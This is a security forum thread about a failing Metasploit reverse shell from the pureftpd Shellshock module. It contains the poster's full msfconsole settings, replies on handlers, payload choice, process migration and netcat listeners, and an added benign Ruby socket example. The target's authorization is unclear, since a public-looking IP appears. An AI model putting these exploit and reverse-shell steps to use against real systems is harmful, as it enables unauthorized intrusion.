shell and meterpreter


This topic contains 17 replies, has 6 voices, and was last updated by  omer 6 months, 4 weeks ago.

  • #33815

    Zjelko
    Participant

    Hello all,

    I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter. Anyone know what I am missing? I launched the exploit by hand, target was vulnerable and is compromised.

    Thanks

    #33839

    Anonymous

    Did you set meterpreter as the payload? If so, what is the error?

    #33873

    Zjelko
    Participant

    I will copy the error as soon as I am back to work, at home I don’t have access to the server.

    #33881

    Syn/Ack
    Participant

    In general to make this work:
    Make sure to generate a meterpreter payload (ie windows/meterpreter/reverse_tcp for windows)
    Start a listener in msfconsole: exploit/multi/handler
    Set the same payload in the handler as in the exploit.

    Run the handler first, then fire the exploit.

    Good luck.

    #33954

    Zjelko
    Participant

    Thanks, I forgot to run the handler before the exploit.

    #33966

    Syn/Ack
    Participant

    Makes sense…
    Cool that you got it working! 😀

    #34448

    Zjelko
    Participant

    Now I get this strange error ….. Reason: Died from EOFError ….. H E L P please

    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started bind handler
    msf exploit(pureftpd_bash_env_exec) > sessions

    Active sessions
    ===============

    Id  Type   Information  Connection
    --  ----   -----------  ----------
    1   shell               192.168.1.108:40236 -> 00.00.111.00

    msf exploit(pureftpd_bash_env_exec) > sessions -i 1
    [*] Starting interaction with 1...

    [*] 00.00.111.00 - Command shell session 1 closed. Reason: Died from EOFError

    #34460

    Matt Pardo
    Participant

    Can you post your Show options output? Redact any Internet-facing IPs, of course.

    #34463

    Zjelko
    Participant

    I can, I will rerun the procedure.
    The RHOST number above is of course not real, I replaced it with a fake one.

    #34471

    Zjelko
    Participant

    use exploit/multi/ftp/pureftpd_bash_env_exec
    msf exploit(pureftpd_bash_env_exec) > set TARGET 1
    TARGET => 1
    msf exploit(pureftpd_bash_env_exec) > set PAYLOAD generic/shell_reverse_tcp
    PAYLOAD => generic/shell_reverse_tcp
    msf exploit(pureftpd_bash_env_exec) > set LHOST 192.168.1.108
    LHOST => 192.168.1.108

    This answer I found myself but it doesn’t help me even a bit:
    EOFError (End of File error) is thrown when you are trying to carry out an operation on a file object that is already referencing the end of the file. In this example, we are trying to readline when the line doesn’t exist.
    msf exploit(pureftpd_bash_env_exec) > set LPORT 17149
    LPORT => 17149
    msf exploit(pureftpd_bash_env_exec) > set SSLVersion TLS1
    SSLVersion => TLS1
    msf exploit(pureftpd_bash_env_exec) > set RPORT 21
    RPORT => 21
    msf exploit(pureftpd_bash_env_exec) > set SSLVerifyMode PEER
    SSLVerifyMode => PEER
    msf exploit(pureftpd_bash_env_exec) > set VERBOSE 0
    VERBOSE => 0
    msf exploit(pureftpd_bash_env_exec) > set WfsDelay 0
    WfsDelay => 0
    msf exploit(pureftpd_bash_env_exec) > set SSL 0
    SSL => 0
    msf exploit(pureftpd_bash_env_exec) > set ConnectTimeout 10
    ConnectTimeout => 10
    msf exploit(pureftpd_bash_env_exec) > set TCP::send_delay 0
    TCP::send_delay => 0
    msf exploit(pureftpd_bash_env_exec) > set EnableContextEncoding 0
    EnableContextEncoding => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPDEBUG 0
    FTPDEBUG => 0
    msf exploit(pureftpd_bash_env_exec) > set DisablePayloadHandler 0
    DisablePayloadHandler => 0
    msf exploit(pureftpd_bash_env_exec) > set FTPTimeout 16
    FTPTimeout => 16
    msf exploit(pureftpd_bash_env_exec) > set TCP::max_send_size 0
    TCP::max_send_size => 0
    msf exploit(pureftpd_bash_env_exec) > set RHOST 00.00.000.000
    RHOST => 83.96.159.56
    msf exploit(pureftpd_bash_env_exec) > set CMDSTAGER::FLAVOR auto
    CMDSTAGER::FLAVOR => auto
    msf exploit(pureftpd_bash_env_exec) > set RPATH /bin
    RPATH => /bin
    msf exploit(pureftpd_bash_env_exec) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.1.108:17149

    • This reply was modified 3 years, 5 months ago by  Zjelko.
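
Added example (not part of the thread and not Metasploit's own code): Metasploit is written in Ruby, and in Ruby a socket read raises EOFError when the peer has closed the connection, so the "Died from EOFError" reason in the posts above points at the remote end of the session going away rather than at a file on disk. The sketch below uses a constructed local peer to tell that case apart from a peer that is alive but silent; start_peer, read_event and observe are hypothetical names.

```ruby
require 'socket'

# Constructed local peer: sends one line, then behaves per `mode`.
#   :close -> closes right after the banner (the process on the far end exited)
#   :idle  -> keeps the connection open for a while but sends nothing more
def start_peer(mode)
  server = TCPServer.new('127.0.0.1', 0)   # port 0 = let the OS pick a free port
  thread = Thread.new do
    conn = server.accept
    conn.write("banner\n")
    sleep 1.5 if mode == :idle
    conn.close
    server.close
  end
  [server.addr[1], thread]                 # addr[1] is the chosen port
end

# Perform one read on the session socket and classify the outcome.
def read_event(sock, timeout)
  return [:idle_timeout, nil] unless IO.select([sock], nil, nil, timeout)
  [:data, sock.readpartial(4096)]
rescue EOFError
  [:peer_closed, nil]                      # orderly close: the remote side ended
rescue Errno::ECONNRESET
  [:reset, nil]                            # abortive close (RST) from the peer
end

# Connect, read the banner, then see what the next read reports.
def observe(mode, timeout = 0.3)
  port, thread = start_peer(mode)
  sock = TCPSocket.new('127.0.0.1', port)
  first  = read_event(sock, 2)
  second = read_event(sock, timeout)
  sock.close
  thread.join
  [first, second.first]
end

if __FILE__ == $0
  p observe(:close)   # peer exits after the banner
  p observe(:idle)    # peer stays connected but silent
end
```

A session that ends with :peer_closed was terminated on the target side (process exit, watchdog, service restart), which is why the later replies look at the payload and the state of the FTP server rather than at the handler options.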
    #34497

    Matt Pardo
    Participant

    Nothing is obvious from your output. I haven’t seen that error before but that doesn’t mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren’t any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where.

    #34649

    Zjelko
    Participant

    Thanks for your response,

    The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to list the sessions I can see that a session is open. This wouldn’t be the case if the target wasn’t compromised.
    I haven’t figured it out yet, but I will. I am going for the admin account.

    Thanks again

    #34664

    Syn/Ack
    Participant

    I found that some shells and some exploits don’t really work well together.
    In your output above you use generic/shell_reverse_tcp.

    Maybe give linux/x86/shell_reverse_tcp a try instead. I’ve been more successful with that one…

    #34709

    manuellito
    Participant

    Hi,
    You should upload an exe payload to the server and run it in order to open a more stable reverse shell.
    I got exactly the same problem with Brainpan 1 (on Vulnhub) last week. I’ve found the shell is more stable if I used a non-meterpreter reverse shell, but a standard one.

    #34716

    Syn/Ack
    Participant

    Using an executable to set up a reverse meterpreter shell is not always an option… As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot.

    However, looking at the provided options Zjelko is not using Meterpreter, but a standard reverse shell: generic/shell_reverse_tcp.

    #34718

    Matt Pardo
    Participant

    Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options?

    #34771

    Zjelko
    Participant

    Hello guys,

    Uploading a file isn’t an option yet. I do agree with the both of you and will try to use another, maybe more stable, reverse_shell. Thanks, and I’ll keep you posted.

    #195630

    omer
    Participant

    Couple of years late, but have you tried setting the handler via netcat? Worked for me on a similar case and that solved it.
